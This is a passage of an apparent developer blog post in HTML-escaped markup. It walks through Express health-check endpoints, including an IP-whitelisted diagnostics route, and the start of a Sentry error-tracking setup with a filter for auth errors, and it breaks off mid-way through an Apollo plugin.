&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/health&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ok&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="c1"&gt;// Readiness probe — "can it serve traffic?"&lt;/span&gt;
&lt;span class="c1"&gt;// 200 when healthy, 503 when degraded.&lt;/span&gt;
&lt;span class="c1"&gt;// Pulsetic targets this endpoint.&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/health/ready&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;healthy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;checks&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;runChecks&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

  &lt;span class="c1"&gt;// Strip latencies — no sensitive details for public consumers&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="na"&gt;coarseChecks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Record&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt;
  &lt;span class="k"&gt;for &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="k"&gt;of&lt;/span&gt; &lt;span class="nb"&gt;Object&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;checks&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;coarseChecks&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;healthy&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;503&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;healthy&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ok&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;degraded&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toISOString&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="na"&gt;checks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;coarseChecks&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="c1"&gt;// Internal diagnostics — full checks + system info&lt;/span&gt;
&lt;span class="c1"&gt;// IP-whitelisted: loopback, Docker bridge, 10.x private networks only.&lt;/span&gt;
&lt;span class="c1"&gt;// CI pipeline uses this from inside the Docker network.&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/health/details&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nf"&gt;isTrusted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;403&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;Forbidden&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;healthy&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;checks&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;runChecks&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;system&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getSystemInfo&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

  &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;status&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;healthy&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;503&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;json&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;healthy&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ok&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;degraded&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toISOString&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="nx"&gt;checks&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// includes latencies&lt;/span&gt;
    &lt;span class="nx"&gt;system&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;   &lt;span class="c1"&gt;// includes memoryUsage, loadAvg, cpus, uptime, nodeVersion&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The IP guard for &lt;code&gt;/health/details&lt;/code&gt; is worth calling out:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;TRUSTED_EXACT&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Set&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;127.0.0.1&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;::1&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;::ffff:127.0.0.1&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;TRUSTED_PREFIXES&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;10.&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="k"&gt;from&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;length&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="s2"&gt;`172.&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="mi"&gt;16&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.`&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="c1"&gt;// Docker bridge ranges: 172.17.x through 172.31.x&lt;/span&gt;
&lt;span class="p"&gt;];&lt;/span&gt;

&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;isTrusted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nx"&gt;boolean&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;ip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;socket&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;remoteAddress&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="dl"&gt;''&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;TRUSTED_EXACT&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;has&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;TRUSTED_PREFIXES&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;some&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nx"&gt;prefix&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;startsWith&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;prefix&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Calling it from the public internet returns &lt;code&gt;403 Forbidden&lt;/code&gt;. From inside Docker (CI pipeline) it returns the full diagnostics JSON.&lt;/p&gt;




&lt;h2&gt;
  
  
  Layer 2: Sentry — Error Tracking for Both Services
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Backend Setup (&lt;code&gt;@sentry/node&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;The critical thing: &lt;strong&gt;Sentry must be the very first import&lt;/strong&gt; in &lt;code&gt;backend/src/index.ts&lt;/code&gt;. Before Express, before Apollo, before anything.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// backend/src/instrument.ts&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nx"&gt;Sentry&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@sentry/node&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="kd"&gt;type&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;EventHint&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@sentry/node&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;GraphQLError&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;graphql&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;AUTH_CODES&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Set&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;UNAUTHENTICATED&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;FORBIDDEN&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;BAD_USER_INPUT&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;

&lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SENTRY_DSN&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;Sentry&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;init&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;dsn&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SENTRY_DSN&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;NODE_ENV&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;tracesSampleRate&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;env&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;NODE_ENV&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;production&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="mf"&gt;0.2&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mf"&gt;1.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;

    &lt;span class="nf"&gt;beforeSend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;EventHint&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="c1"&gt;// Skip HTTP 401/403 — auth flow, not bugs&lt;/span&gt;
      &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;statusCode&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;contexts&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;status_code&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;statusCode&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;401&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;statusCode&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;403&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

      &lt;span class="c1"&gt;// Skip GraphQL auth/validation errors&lt;/span&gt;
      &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;original&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;hint&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;originalException&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;original&lt;/span&gt; &lt;span class="k"&gt;instanceof&lt;/span&gt; &lt;span class="nx"&gt;GraphQLError&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;original&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;extensions&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;typeof&lt;/span&gt; &lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;string&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;AUTH_CODES&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;has&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;null&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;

      &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;event&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;

    &lt;span class="na"&gt;initialScope&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;service&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;portfolio-api&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;beforeSend&lt;/code&gt; filter is important. Without it, every unauthenticated API request fires a Sentry event. That's noise, not signal — so I filter out &lt;code&gt;UNAUTHENTICATED&lt;/code&gt;, &lt;code&gt;FORBIDDEN&lt;/code&gt;, &lt;code&gt;BAD_USER_INPUT&lt;/code&gt;, and HTTP 401/403.&lt;/p&gt;

&lt;p&gt;For GraphQL specifically, I added an Apollo plugin that captures non-auth errors:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// In Apollo Server setup (backend/src/index.ts)&lt;/span&gt;
&lt;span class="nx"&gt;plugins&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
  &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="nf"&gt;requestDidStart&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="nf"&gt;didEncounterErrors&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;errors&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
